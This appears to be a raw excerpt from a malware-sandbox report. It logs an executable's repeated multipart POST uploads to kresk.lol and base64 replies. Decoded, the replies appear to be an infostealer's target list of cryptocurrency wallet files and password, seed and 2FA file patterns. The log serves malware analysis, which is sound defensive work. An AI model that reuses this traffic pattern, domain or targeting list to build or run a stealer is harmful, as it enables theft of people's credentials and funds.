                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:07 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                      2024-12-04 16:05:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:18 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      25192.168.2.449811159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:10 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----W4OHLXBIEU3EUA1VAASR
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:10 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 57 34 4f 48 4c 58 42 49 45 55 33 45 55 41 31 56 41 41 53 52 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------W4OHLXBIEU3EUA1VAASRContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------W4OHLXBIEU3EUA1VAASRContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------W4OHLXBIEU3EUA1VAASRCont
                                                                                                                                                                      2024-12-04 16:05:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:11 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:11 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                      Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      26192.168.2.449816159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:13 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QQIEKNGVAAAAIE3O8Q16
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:13 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 49 45 4b 4e 47 56 41 41 41 41 49 45 33 4f 38 51 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QQIEKNGVAAAAIE3O8Q16Content-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QQIEKNGVAAAAIE3O8Q16Cont
                                                                                                                                                                      2024-12-04 16:05:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:14 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:15 UTC1636INData Raw: 36 35 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                      Data Ascii: 658REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      27192.168.2.449821159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:17 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CB1DTR9ZC2V37Q1VKXBS
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1825
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:17 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 43 42 31 44 54 52 39 5a 43 32 56 33 37 51 31 56 4b 58 42 53 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------CB1DTR9ZC2V37Q1VKXBSContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------CB1DTR9ZC2V37Q1VKXBSCont
                                                                                                                                                                      2024-12-04 16:05:18 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:17 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      28192.168.2.449828159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:19 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----QQ9H4W4WLXBAIEK6PPHD
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1825
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:19 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 51 51 39 48 34 57 34 57 4c 58 42 41 49 45 4b 36 50 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 51 51 39 48 34 57 34 57 4c 58 42 41 49 45 4b 36 50 50 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 51 51 39 48 34 57 34 57 4c 58 42 41 49 45 4b 36 50 50 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------QQ9H4W4WLXBAIEK6PPHDContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------QQ9H4W4WLXBAIEK6PPHDContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------QQ9H4W4WLXBAIEK6PPHDCont
                                                                                                                                                                      2024-12-04 16:05:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:20 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:20 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      29192.168.2.449832159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:20 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----R1D26XB16P8QIECJWLNO
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1825
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:20 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 52 31 44 32 36 58 42 31 36 50 38 51 49 45 43 4a 57 4c 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 32 36 58 42 31 36 50 38 51 49 45 43 4a 57 4c 4e 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 52 31 44 32 36 58 42 31 36 50 38 51 49 45 43 4a 57 4c 4e 4f 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------R1D26XB16P8QIECJWLNOContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------R1D26XB16P8QIECJWLNOContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------R1D26XB16P8QIECJWLNOCont
                                                                                                                                                                      2024-12-04 16:05:21 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:21 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:21 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      30192.168.2.449836159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:22 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----NOZUKFCT00ZUAAA1VKFU
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1825
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:22 UTC1825OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------NOZUKFCT00ZUAAA1VKFUCont
                                                                                                                                                                      2024-12-04 16:05:23 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:23 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:23 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      31192.168.2.449838159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-12-04 16:05:23 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----NOZUKFCT00ZUAAA1VKFU
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                      Host: kresk.lol
                                                                                                                                                                      Content-Length: 1837
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-12-04 16:05:23 UTC1837OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 61 65 62 34 34 36 65 36 35 65 33 64 65 36 65 38 62 64 36 33 66 37 39 65 31 31 31 35 32 65 39 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 33 32 65 66 39 61 34 66 35 32 38 33 63 34 38 32 30 61 35 39 31 35 36 31 39 63 36 37 66 37 32 0d 0a 2d 2d 2d 2d 2d 2d 4e 4f 5a 55 4b 46 43 54 30 30 5a 55 41 41 41 31 56 4b 46 55 0d 0a 43 6f 6e 74
                                                                                                                                                                      Data Ascii: ------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="token"6aeb446e65e3de6e8bd63f79e11152e9------NOZUKFCT00ZUAAA1VKFUContent-Disposition: form-data; name="build_id"d32ef9a4f5283c4820a5915619c67f72------NOZUKFCT00ZUAAA1VKFUCont
                                                                                                                                                                      2024-12-04 16:05:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Wed, 04 Dec 2024 16:05:24 GMT
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: close
                                                                                                                                                                      2024-12-04 16:05:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      32192.168.2.449841159.69.102.1654438080C:\AAxBDhzeE\25aac720-4b65-4596-94df-b9a776dc62c7.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
